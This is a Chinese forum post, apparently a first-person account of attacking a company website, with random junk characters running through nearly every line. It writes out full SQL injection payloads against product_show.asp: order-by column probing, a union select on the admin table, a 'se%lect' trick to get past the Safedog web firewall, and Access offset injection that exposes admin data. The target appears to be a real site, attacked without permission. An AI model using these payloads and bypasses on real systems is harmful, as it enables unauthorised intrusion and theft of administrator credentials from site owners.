打开网站,一个企业站。) X7 p! G4 f0 o+ P% K
; C# \5 O8 H O' Z: b. m5 Y6 d: T7 |$ c$ |
顺手加个admin, K( g( K' _! q) t
) n" `2 F* _2 R$ t: C' `0 G0 ]1 m8 {7 I! k
默认后台。 r U I( c; [3 N1 o
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
! U& L, c" E2 }, g( h% _5 O
q4 ~5 L% U1 Q: X' P" U4 C) R2 a ?+ [; N+ Y
# F y+ I( p: e8 b- W# m所以就不用御剑扫了,待会直接封IP。/ h: R& \( v" M Y
2 s+ |! v! g2 M E8 H. w用order by语句判断是否存在注入。
: v8 g2 g( Q; Y# r4 W& G3 Phttp://www.xxx.com /product_show.asp?id=997 order by 1
0 z5 C9 V6 k$ J' R8 \http://www.xxx.com /product_show.asp?id=997 order by 100) u6 e7 {1 ]3 w! c5 B9 J
现在存在注入,经测试后发现是9个字段。( H9 _ ?* A3 \+ q" X
' n1 p3 F, y0 [. ]接下来进行联合查询,猜是否存在admin表。# w* ]* q# J$ y8 H. ]1 o% W
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。! |' m. l5 p. i9 M! H/ D
4 b; T& I0 v0 `& z& s8 N" P" Z% H8 D) ^! j- x1 z
& k" }/ {) A2 N; r; R7 H3 d8 V在select中间加个%,se%lect绕过安全狗。
5 f3 v' u4 u/ y; i( e3 P# n
7 e. c; D9 D5 P2 }3 [- l( U# W: H7 s: F Q
发现存在admin表,然后开始手工猜常用的字段。
' R7 H+ J/ ^2 U1 W3 \纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。6 P# e2 Q+ {+ R% F k- Q( c
. n3 Z4 W9 f5 R) ]
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
3 ~- k2 W2 Q6 ^9 F C! m- }
3 A+ D) x) _( j% G- [2 {科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
4 q# O; R2 ~/ H; B+ xhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
% L& M" ~- J' c O# s \9 i好了,敏感内容出显了。
3 k2 a" s* r7 h- r: g. J5 D( W# E/ d/ w6 m( ?1 U
# N; n& O& s3 P* I9 _, W: N: E' \& N$ g. [8 d* L' k
|